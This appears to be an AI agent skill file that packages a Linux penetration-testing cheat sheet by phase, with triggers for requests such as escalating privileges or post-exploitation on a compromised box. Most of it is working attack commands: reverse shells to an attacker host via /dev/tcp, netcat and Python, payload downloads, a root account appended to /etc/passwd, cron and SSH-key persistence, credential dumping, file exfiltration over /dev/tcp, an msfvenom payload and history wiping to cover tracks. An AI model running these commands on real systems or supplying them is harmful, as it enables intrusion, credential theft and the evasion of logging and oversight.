Practical Linux command reference and penetration testing notes for reconnaissance, enumeration, exploitation, and privilege escalation
---
name: linux-pentesting-commands
description: Practical Linux command reference for penetration testing covering recon, enumeration, exploitation, privilege escalation, and post-exploitation
triggers:
- how do I enumerate services on a Linux target
- show me privilege escalation commands for pentesting
- what are common recon commands for Linux pentesting
- help me with post-exploitation on a compromised Linux system
- give me enumeration techniques for Linux machines
- show me exploitation commands for Linux pentesting
- what commands should I use for lateral movement on Linux
- help me escalate privileges on a Linux box
---
# Linux Pentesting Commands Skill
> Skill by [ara.so](https://ara.so) — Security Skills collection.
This skill provides expertise in using the **Linux for a Pentester** repository, a curated collection of practical Linux commands organized by penetration testing phases. The repository serves as a comprehensive command reference built from real-world labs, CTFs, and hands-on practice.
## What This Project Provides
A structured collection of Linux pentesting commands organized into:
- **General Commands**: Essential system survival and navigation
- **Reconnaissance**: Local and network discovery
- **Enumeration**: Service and user data deep-diving
- **Exploitation**: Initial access and foothold techniques
- **Privilege Escalation**: Techniques to gain root access
- **Post-Exploitation**: Persistence, cleanup, lateral movement
- **Cheatsheets**: Quick reference one-liners
## Installation & Setup
```bash
# Clone the repository
git clone https://github.com/HIMANSHUSHARMA20/Linux-for-a-Pentester.git
cd Linux-for-a-Pentester
# Browse the structure
ls -la
# Navigate to specific modules
cd 01-Recon/
cd 04-Privilege-Escalation/
```
This is a reference repository, not an installable tool. Use it alongside your pentesting workflow.
## Key Command Categories
### General Commands (00-General-Commands/)
Essential Linux navigation and system commands:
```bash
# File operations
find / -name "*.conf" 2>/dev/null
grep -ri "password" /home/ 2>/dev/null
locate suid 2>/dev/null
# System information
uname -a
cat /etc/os-release
hostname
id
whoami
# Process management
ps aux | grep root
top
netstat -tulnp
ss -tulnp
```
### Reconnaissance (01-Recon/)
Local and network reconnaissance techniques:
```bash
# Network discovery
ip addr show
ifconfig
arp -a
route -n
# Port scanning
nmap -sV -sC -p- <target>
netstat -ano
ss -tuln
# User enumeration
cat /etc/passwd
cat /etc/group
w
who
last
# Hostname and DNS
hostname -f
cat /etc/hosts
cat /etc/resolv.conf
```
### Enumeration (02-Enumeration/)
Deep service and system enumeration:
```bash
# Service enumeration
systemctl list-units --type=service
ps aux
netstat -tulnp | grep LISTEN
# File system enumeration
find / -perm -4000 2>/dev/null # SUID binaries
find / -writable -type d 2>/dev/null # Writable directories
find /home -type f -readable 2>/dev/null
# Cron jobs
cat /etc/crontab
ls -la /etc/cron.*
crontab -l
# Capabilities
getcap -r / 2>/dev/null
# Environment variables
env
echo $PATH
cat /proc/self/environ
```
### Exploitation (03-Exploitation/)
Initial access and foothold techniques:
```bash
# Reverse shells
bash -i >& /dev/tcp/<attacker-ip>/4444 0>&1
nc -e /bin/bash <attacker-ip> 4444
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<attacker-ip>",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'
# Shell upgrade
python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
# Press Ctrl+Z
stty raw -echo; fg
# File transfer
wget http://<attacker-ip>/file -O /tmp/file
curl http://<attacker-ip>/file -o /tmp/file
scp user@<attacker-ip>:/path/file /tmp/
# Local file inclusion
cat /etc/passwd
cat /var/log/apache2/access.log
```
### Privilege Escalation (04-Privilege-Escalation/)
Techniques to escalate to root:
```bash
# SUID binaries
find / -perm -4000 -type f 2>/dev/null
find / -uid 0 -perm -4000 -type f 2>/dev/null
# Sudo abuse
sudo -l
sudo -u#-1 /bin/bash # CVE-2019-14287
# Writable /etc/passwd
echo 'hacker:$(openssl passwd -1 -salt hack password123):0:0:root:/root:/bin/bash' >> /etc/passwd
# Cron job abuse
echo 'bash -i >& /dev/tcp/<attacker-ip>/4444 0>&1' > /tmp/malicious.sh
chmod +x /tmp/malicious.sh
# Wait for cron to execute
# Kernel exploits
uname -r
searchsploit "Linux Kernel $(uname -r)"
# Capabilities abuse
getcap -r / 2>/dev/null
# Example: python with cap_setuid
python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'
# PATH hijacking
echo '/bin/bash' > /tmp/ls
chmod +x /tmp/ls
export PATH=/tmp:$PATH
```
### Post-Exploitation (05-Post-Exploitation/)
Persistence and lateral movement:
```bash
# Persistence - SSH keys
mkdir -p /root/.ssh
echo 'ssh-rsa <your-public-key>' >> /root/.ssh/authorized_keys
chmod 600 /root/.ssh/authorized_keys
# Persistence - Cron
echo '*/5 * * * * /bin/bash -c "bash -i >& /dev/tcp/<attacker-ip>/4444 0>&1"' | crontab -
# Credential harvesting
cat /home/*/.bash_history
grep -r "password" /home/ 2>/dev/null
cat /var/log/auth.log | grep password
# Network pivoting
ssh -D 1080 user@target # SOCKS proxy
ssh -L 8080:internal-host:80 user@target # Port forwarding
# Cleanup
history -c
rm ~/.bash_history
ln -sf /dev/null ~/.bash_history
```
## Common Patterns
### Quick System Assessment
```bash
#!/bin/bash
# Quick enumeration script
echo "[*] System Information"
uname -a
cat /etc/os-release
echo "[*] Current User"
id
whoami
echo "[*] SUID Binaries"
find / -perm -4000 -type f 2>/dev/null
echo "[*] Sudo Rights"
sudo -l
echo "[*] Network Connections"
ss -tulnp
echo "[*] Cron Jobs"
cat /etc/crontab
ls -la /etc/cron.*
```
### Automated Enumeration
```bash
# Use LinPEAS for comprehensive enumeration
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh
# Use LinEnum
wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
chmod +x LinEnum.sh
./LinEnum.sh
```
### Reverse Shell Listener
```bash
# On attacker machine
nc -lvnp 4444
# Or use rlwrap for better shell
rlwrap nc -lvnp 4444
# Or use pwncat for automatic shell upgrade
pwncat-cs -lp 4444
```
## Real-World Workflow
### Phase 1: Initial Access
```bash
# After compromising a service, get a shell
bash -c 'bash -i >& /dev/tcp/$ATTACKER_IP/4444 0>&1'
# Upgrade the shell
python3 -c 'import pty;pty.spawn("/bin/bash")'
# Ctrl+Z
stty raw -echo; fg
export TERM=xterm
```
### Phase 2: Enumeration
```bash
# Basic system info
id && hostname && uname -a
# Check sudo rights
sudo -l
# Find SUID binaries
find / -perm -4000 -type f 2>/dev/null
# Check for capabilities
getcap -r / 2>/dev/null
# Review cron jobs
cat /etc/crontab
```
### Phase 3: Privilege Escalation
```bash
# If sudo misconfiguration found
sudo <vulnerable-binary>
# If writable script in cron
echo 'chmod +s /bin/bash' > /path/to/writable/script.sh
# If SUID binary exploitable
/path/to/suid/binary <exploit-technique>
```
### Phase 4: Post-Exploitation
```bash
# Establish persistence
echo 'ssh-rsa $YOUR_PUBLIC_KEY' >> /root/.ssh/authorized_keys
# Dump credentials
cat /etc/shadow
grep -r "password" /var/www/html/ 2>/dev/null
# Clean tracks
history -c && rm ~/.bash_history
```
## Troubleshooting
### Shell Issues
```bash
# If Python not available, try Python2
python -c 'import pty;pty.spawn("/bin/bash")'
# If no Python, try script
script -qc /bin/bash /dev/null
# If shell dies, check for process monitoring
ps aux | grep -i monitor
```
### Permission Denied Errors
```bash
# Redirect stderr to hide errors
find / -name "*.conf" 2>/dev/null
# Use sudo if available
sudo find /root -name "*.conf"
# Check current capabilities
capsh --print
```
### Network Connectivity Issues
```bash
# Check firewall rules
iptables -L -n
nft list ruleset
# Test connectivity
ping -c 1 $ATTACKER_IP
curl http://$ATTACKER_IP
# Alternative file transfer if wget/curl blocked
cat /path/to/file > /dev/tcp/$ATTACKER_IP/8080
```
## Best Practices
1. **Always redirect stderr** when searching: `2>/dev/null`
2. **Upgrade shells immediately** after initial access
3. **Document findings** as you enumerate
4. **Test exploits carefully** to avoid system crashes
5. **Clean up artifacts** after post-exploitation
6. **Use environment variables** for attacker IP: `export ATTACKER_IP=10.10.14.5`
## Integration with Tools
```bash
# Combined with Metasploit
msfvenom -p linux/x64/shell_reverse_tcp LHOST=$ATTACKER_IP LPORT=4444 -f elf > shell.elf
# Combined with searchsploit
searchsploit -m <exploit-id>
# Combined with GTFOBins
# Visit https://gtfobins.github.io/ and search for SUID binary
# Combined with automated tools
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
bash linpeas.sh
```
This skill enables AI agents to provide practical, command-level assistance for Linux penetration testing workflows based on the organized reference material in this repository.
Creator's repository · aradotso/security-skills